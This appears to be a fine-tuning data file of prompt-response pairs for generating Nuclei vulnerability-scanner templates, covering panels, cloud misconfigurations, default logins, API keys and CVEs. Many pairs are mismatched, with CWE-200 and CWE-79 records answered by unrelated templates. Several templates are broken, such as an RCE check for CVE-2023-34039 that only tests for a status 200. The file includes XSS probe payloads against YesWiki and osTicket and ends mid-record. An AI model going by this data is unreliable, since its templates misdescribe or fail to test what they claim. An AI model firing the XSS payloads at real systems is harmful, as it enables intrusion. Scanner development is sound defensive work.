"tags": [
"dns",
"ns",
"darkweb",
"fbi",
"seized",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "spoofable-spf-records-ptr",
"severity": "info",
"tags": [
"dns",
"spf",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "dzzoffice-panel",
"info": {
"name": "DzzOffice Login Panel - Detect",
"author": "ritikchaddha",
"severity": "info",
"description": "DzzOffice login panel was detected.",
"tags": [
"dzzoffice",
"panel",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}",
"{{BaseURL}}/index.php",
"{{BaseURL}}/user.php?mod=login"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"content=\"DzzOffice",
"DZZSCRIPT",
"dzzoffice.com"
],
"condition": "or"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and",
"max_redirects": 2,
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-dzzoffice-panel",
"timestamp": "2025-11-13T15:15:48.402549Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "fbi-seized-nameserver",
"severity": "info",
"tags": [
"dns",
"ns",
"darkweb",
"fbi",
"seized",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "detect-jabber-xmpp",
"info": {
"name": "Jabber XMPP Protocol - Detect",
"author": "geeknik",
"severity": "info",
"description": "Jabber XMPP protocol was detected.",
"tags": [
"network",
"jabber",
"xmpp",
"messaging",
"detect",
"detection",
"tcp",
"discovery"
],
"reference": [
"https://datatracker.ietf.org/doc/html/rfc6120"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-detect-jabber-xmpp",
"timestamp": "2025-11-13T15:16:08.269162Z"
}
}
|
api-calendarific
|
[CANONICAL_RECORD]
{
"cve_id": "api-calendarific",
"summary": "Worldwide Holidays. This template detects Calendarific API Test by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"https://calendarific.com/api/v2/holidays?api_key={{token}}&country=US&year=2021"
],
"indicators": [
"\"holidays\"",
"\"name\"",
"\"description\""
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "api-calendarific",
"info": {
"name": "Calendarific API Test",
"author": "daffainfo",
"severity": "info",
"description": "Worldwide Holidays. This template detects security vulnerabilities.",
"tags": [
"token-spray",
"calendarific"
],
"reference": [
"https://calendarific.com/api-documentation",
"https://github.com/daffainfo/all-about-apikey/tree/main/calendarific"
]
},
"requests": [
{
"method": "GET",
"path": [
"https://calendarific.com/api/v2/holidays?api_key={{token}}&country=US&year=2021"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"\"holidays\"",
"\"name\"",
"\"description\""
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-api-calendarific",
"timestamp": "2025-11-13T15:16:06.532344Z"
}
}
|
CVE-2023-34039
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2023-34039",
"summary": "Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation.\u00a0A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI.",
"affected_products": [
{
"vendor": "vmware",
"product": "aria_operations_for_networks",
"version_range": ">= 6.2.0, < 6.11.0"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2019-0604",
"severity": "critical",
"tags": [
"cve",
"cve2019",
"sharepoint",
"microsoft",
"rce",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html",
"snippet": "PoC available at http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html"
},
{
"source": "nvd",
"url": "http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html",
"snippet": "PoC available at http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html"
},
{
"source": "nvd",
"url": "http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html",
"snippet": "PoC available at http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html"
},
{
"source": "nvd",
"url": "http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html",
"snippet": "PoC available at http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2023-34039",
"info": {
"name": "VMWare Aria Operations - Remote Code Execution",
"author": "tarunKoyalwar",
"severity": "critical",
"description": "VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)\nVersion: All versions from 6.0 to 6.10\n",
"tags": [
"js",
"packetstorm",
"cve",
"vmware",
"aria",
"rce",
"fuzz",
"vrealize",
"cve2023",
"vuln"
],
"reference": [
"https://github.com/sinsinology/CVE-2023-34039.git",
"https://nvd.nist.gov/vuln/detail/CVE-2023-34039",
"http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html",
"http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html",
"https://www.vmware.com/security/advisories/VMSA-2023-0018.html"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2023-34039",
"timestamp": "2025-11-13T15:16:08.007468Z"
}
}
|
CWE-79
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-79",
"summary": "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.",
"affected_products": [],
"paths": [],
"indicators": [
"vulnerability detected",
"error"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "yeswiki-xss",
"info": {
"name": "YesWiki <2022-07-07 - Cross-Site Scripting",
"author": "arafatansari",
"severity": "medium",
"description": "YesWiki before 2022-07-07 contains a cross-site scripting vulnerability via the id parameter in the AccueiL URL.\n",
"tags": [
"yeswiki",
"huntr",
"xss",
"vuln"
],
"reference": [
"https://huntr.dev/bounties/de4db96c-2717-4c0e-b7aa-eee756ca19d3/"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"<script>alert(document.domain)</script>",
"Query failed:"
],
"condition": "and"
},
{
"type": "word",
"part": "header",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-yeswiki-xss",
"timestamp": "2025-11-13T15:16:07.490983Z"
}
}
|
oracle-xmldb-ftp-detect
|
[CANONICAL_RECORD]
{
"cve_id": "oracle-xmldb-ftp-detect",
"summary": "Oracle XML DB FTP service was detected.. This template detects Oracle XML DB FTP Service - Detect by checking specific patterns and responses.",
"affected_products": [],
"paths": [],
"indicators": [
"Oracle XML DB FTP Service - Detect",
"detected"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "oracle-xmldb-ftp-detect",
"info": {
"name": "Oracle XML DB FTP Service - Detect",
"author": "pussycat0x",
"severity": "info",
"description": "Oracle XML DB FTP service was detected.",
"tags": [
"network",
"ftp",
"oracle",
"detect",
"tcp",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-oracle-xmldb-ftp-detect",
"timestamp": "2025-11-13T15:16:08.322440Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "alternc-panel",
"info": {
"name": "AlternC Desktop Panel - Detect",
"author": "Splint3r7",
"severity": "info",
"description": "AlternC Desktop panel was detected.\n",
"tags": [
"panel",
"alternc",
"login",
"detect",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains(body, \"<title>AlternC Desktop\")",
"status_code == 200"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-alternc-panel",
"timestamp": "2025-11-13T15:15:48.076645Z"
}
}
|
CVE-2023-1318
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2023-1318",
"summary": "Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6.",
"affected_products": [
{
"vendor": "enhancesoft",
"product": "osticket",
"version_range": "< 1.16.6"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2640",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"packetstorm",
"kernel",
"ubuntu",
"linux",
"privesc",
"local",
"canonical",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2023-4911",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"glibc",
"looneytunables",
"linux",
"privesc",
"local",
"kev",
"gnu",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://huntr.dev/bounties/e58b38e0-4897-4bb0-84e8-a7ad8efab338",
"snippet": "PoC available at https://huntr.dev/bounties/e58b38e0-4897-4bb0-84e8-a7ad8efab338"
},
{
"source": "nvd",
"url": "https://huntr.dev/bounties/e58b38e0-4897-4bb0-84e8-a7ad8efab338",
"snippet": "PoC available at https://huntr.dev/bounties/e58b38e0-4897-4bb0-84e8-a7ad8efab338"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2023-1318",
"info": {
"name": "osTicket < v1.16.6 - Cross-Site Scripting",
"author": "ritikchaddha",
"severity": "medium",
"description": "Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6.\n",
"tags": [
"cve",
"cve2023",
"osticket",
"xss",
"authenticated",
"vuln"
],
"reference": [
"https://huntr.com/bounties/e58b38e0-4897-4bb0-84e8-a7ad8efab338",
"https://nvd.nist.gov/vuln/detail/CVE-2023-1318"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains(tolower(body), \"osticket\")"
]
}
]
},
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains(body, \"><script>alert(document.domain)</script>\")",
"contains(header, \"text/html\")",
"status_code == 200"
],
"condition": "and"
}
],
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 2,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2023-1318",
"timestamp": "2025-11-13T15:15:44.982955Z"
}
}
|
gcloud-org-sql-public-ip
|
[CANONICAL_RECORD]
{
"cve_id": "gcloud-org-sql-public-ip",
"summary": "Ensure that \"Restrict Public IP access on Cloud SQL instances\" policy is enforced for your Google Cloud organizations. Due to strict security and compliance regulations, you can't allow GCP members to configure security-critical database instances with public IPs. For highly sensitive workloads, the access to the SQL database instances can be made only through private IP addresses or Google Cloud SQL Proxy.\n",
"affected_products": [],
"paths": [],
"indicators": [
"Public IP Access for Cloud SQL Instances Not Restricted",
"detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "gcloud-org-sql-public-ip",
"info": {
"name": "Public IP Access for Cloud SQL Instances Not Restricted",
"author": "princechaddha",
"severity": "medium",
"description": "Ensure that \"Restrict Public IP access on Cloud SQL instances\" policy is enforced for your Google Cloud organizations. Due to strict security and compliance regulations, you can't allow GCP members to configure security-critical database instances with public IPs. For highly sensitive workloads, the access to the SQL database instances can be made only through private IP addresses or Google Cloud SQL Proxy.\n",
"tags": [
"cloud",
"devops",
"gcp",
"gcloud",
"resourcemanager",
"security",
"sql",
"networking",
"gcp-cloud-config"
],
"reference": [
"https://www.trendmicro.com/cloudoneconformity/knowledge-base/gcp/ResourceManager/restrict-public-ip-access-at-organization-level.html",
"https://cloud.google.com/sql/docs/mysql/configure-ip"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-gcloud-org-sql-public-ip",
"timestamp": "2025-11-13T15:15:38.551954Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "fbi-seized-nameserver",
"severity": "info",
"tags": [
"dns",
"ns",
"darkweb",
"fbi",
"seized",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "insecure-provider-path",
"info": {
"name": "Android Insecure Provider Path - Detect",
"author": "gaurang",
"severity": "medium",
"description": "Android insecure provider path was detected.",
"tags": [
"android",
"file"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-insecure-provider-path",
"timestamp": "2025-11-13T15:15:39.568682Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "fbi-seized-nameserver",
"severity": "info",
"tags": [
"dns",
"ns",
"darkweb",
"fbi",
"seized",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "tableau-service-manager",
"info": {
"name": "Tableau Services Manager Login Panel - Detect",
"author": "DhiyaneshDk",
"severity": "info",
"description": "Tableau Services Manager login panel was detected.",
"tags": [
"panel",
"tableau",
"tableausoftware",
"discovery"
],
"reference": [
"https://help.tableau.com/current/server/en-us/sign_in_tsm.htm"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"words": [
"<title>Login - Tableau Services Manager</title>"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-tableau-service-manager",
"timestamp": "2025-11-13T15:15:49.323250Z"
}
}
|
wildfly-default-login
|
[CANONICAL_RECORD]
{
"cve_id": "wildfly-default-login",
"summary": "Wildfly default admin login credentials were successful.\n",
"affected_products": [],
"paths": [],
"indicators": [
"management-major-version",
"product-version",
"application/json"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "wildfly-default-login",
"info": {
"name": "Wildfly - Default Admin Login",
"author": "s0obi",
"severity": "high",
"description": "Wildfly default admin login credentials were successful.\n",
"tags": [
"wildfly",
"default-login",
"vuln"
],
"reference": [
"https://docs.wildfly.org/26.1/#administrator-guides"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"management-major-version",
"product-version"
],
"condition": "and"
},
{
"type": "word",
"part": "header",
"words": [
"application/json"
]
},
{
"type": "status",
"status": [
200
